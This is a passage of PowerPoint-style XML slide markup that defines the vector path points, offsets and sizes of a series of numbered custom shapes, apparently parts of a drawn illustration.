                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="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84" name="CustomShape 272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604960" y="3471840"/>
            <a:ext cx="58320" cy="17280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="37" h="11">
                <a:moveTo>
                  <a:pt x="0" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="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85" name="CustomShape 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2660760" y="3454560"/>
            <a:ext cx="96480" cy="178920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="61" h="113">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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486" name="CustomShape 274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2708280" y="3413160"/>
            <a:ext cx="124920" cy="23400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="79" h="15">
                <a:moveTo>
                  <a:pt x="0" y="15"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>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487" name="CustomShape 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2637000" y="3637080"/>
            <a:ext cx="209160" cy="70920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132" h="45">
                <a:moveTo>
                  <a:pt x="55" y="44"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="56" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="44"/>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88" name="CustomShape 276"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2592360" y="3656160"/>
            <a:ext cx="213840" cy="63000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="135" h="40">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="132" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5"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89" name="CustomShape 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2629080" y="3646440"/>
            <a:ext cx="209160" cy="56880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132" h="36">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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90" name="CustomShape 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2612880" y="3651120"/>
            <a:ext cx="210600" cy="60120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="133" h="38">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3"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91" name="CustomShape 279"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3503520" y="3514680"/>
            <a:ext cx="394920" cy="331560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="249" h="209">
                <a:moveTo>
                  <a:pt x="68" y="27"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="70" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="219" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="225" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246" y="145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="248" y="160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246" y="165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="2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92" name="CustomShape 280"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3639960" y="3538440"/>
            <a:ext cx="126720" cy="145800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="80" h="92">
                <a:moveTo>
                  <a:pt x="79" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="79" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="4"/>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493" name="CustomShape 281"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3654360" y="3579840"/>
            <a:ext cx="207720" cy="142560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="131" h="90">
                <a:moveTo>
                  <a:pt x="1" y="68"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="76"/>
